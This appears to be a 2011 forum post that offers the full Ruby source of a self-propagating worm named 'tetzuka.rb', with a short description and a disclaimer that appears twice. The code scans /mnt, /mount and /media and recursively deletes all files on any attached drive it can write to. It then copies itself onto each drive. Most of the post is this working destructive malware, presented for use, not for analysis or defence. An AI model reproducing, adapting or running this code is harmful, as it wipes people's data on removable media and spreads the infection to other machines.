11-09-2011، 03:17 PM
Description: This is a Virus (or Worm), that spreads by copying itself to all connected (flash)drives. It does this by checking the directories /mnt, /mount and /media (especially Ubuntu based systems) and copying itself to the directories stored in there. These are normally the ones, where the external drives are connected to. If there is nothing in those directories it will copy there anyway, if there is some data in the directories (normally, when a (flash)drive is connected) it will recursively delete ALL data.
WARNING: This virus has only been tested under special and limited conditions. Do not execute it on a working machine or a machine, that does not belong to you. You are responsible for all actions you take, the author nor the hoster of the site is responsible.
WARNING: This virus has only been tested under special and limited conditions. Do not execute it on a working machine or a machine, that does not belong to you. You are responsible for all actions you take, the author nor the hoster of the site is responsible.
کد:
#!/usr/bin/env ruby
require 'fileutils'
$mount_dirs = Array.new
$mount_dirs = [ "/mnt", "/mount", "/media" ]
for $mount_dir in $mount_dirs do
if File.directory?($mount_dir) then
if File.writable?($mount_dir) then
Dir.open($mount_dir).each do |$dir|
next if $dir == "." || $dir == ".."
$dir2 = $mount_dir + "/" + $dir
if File.directory?($dir2) then
if File.writable?($dir2) then
Dir.open($dir2).each do |$file|
next if $file == "." || $file == ".."
$file2 = $dir2 + "/" + $file
if File.directory?($file2) then
FileUtils.remove_dir($file2, true)
end
if File.file?($file2) then
File.delete($file2)
end
end
end
end
end
end
end
end
for $mount_dir in $mount_dirs do
if File.directory?($mount_dir) then
if File.writable?($mount_dir) then
Dir.open($mount_dir).each do |$dir|
next if $dir == "." || $dir == ".."
$dir2 = $mount_dir + "/" + $dir
$virus = File.open("tetzuka.rb", "r")
$virus2 = File.open("#{$dir2}/tetzuka.rb", "w")
$blksize = $virus.stat.blksize
while ($line = $virus.read($blksize))
$virus2.write($line)
end
end
end
end
end